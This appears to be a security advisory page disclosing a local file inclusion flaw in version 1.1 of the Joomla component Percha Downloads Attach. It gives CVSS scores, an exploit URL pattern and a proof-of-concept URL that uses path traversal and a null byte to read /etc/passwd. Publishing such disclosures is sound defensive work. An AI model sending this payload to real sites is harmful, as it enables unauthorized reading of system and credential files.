Joomla Component Percha Downloads Attach 1.1 Local File Inclusion Vulnerability

2010-05-26 / 2010-05-27
Credit: AntiSecurity
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=========================================================================================================================== [o] Joomla Component Percha Downloads Attach Local File Inclusion Vulnerability Software : com_perchadownloadsattach version 1.1 Vendor : http://www.percha.com/ Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] Contact : public[dot]antisecurity[dot]org Home : http://antisecurity.org/ =========================================================================================================================== [o] Exploit http://localhost/[path]/index.php?option=com_perchadownloadsattach&controller=[LFI] [o] PoC http://localhost/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 =========================================================================================================================== [o] Greetz Angela Zhang stardustmemory aJe martfella pizzyroot Genex H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke ArRay bjork xmazinha & all people in #evilc0de [at] irc.byroe.net =========================================================================================================================== [o] May 17 2010 - GMT +07:00 Jakarta, Indonesia

References:

http://www.securityfocus.com/bid/40244
http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top